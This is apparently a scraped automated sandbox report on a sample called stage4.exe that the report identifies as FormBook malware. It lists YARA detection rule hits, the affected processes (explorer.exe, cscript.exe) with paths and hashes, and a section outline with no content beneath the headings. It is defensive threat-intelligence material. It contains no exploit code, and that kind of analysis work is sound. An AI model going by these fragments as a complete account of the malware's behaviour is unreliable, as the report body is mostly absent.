Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.395568798.0000000000DD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6388

General

Start time:	14:40:39
Start date:	22/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 5700 Parent PID: 2908

General

Start time:	14:41:05
Start date:	22/11/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cscript.exe PID: 6156 Parent PID: 5700

General

Start time:	14:41:42
Start date:	22/11/2021
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0x1190000
File size:	143360 bytes
MD5 hash:	00D3041E47F99E48DD5FFFEDF60F6304
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report stage4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets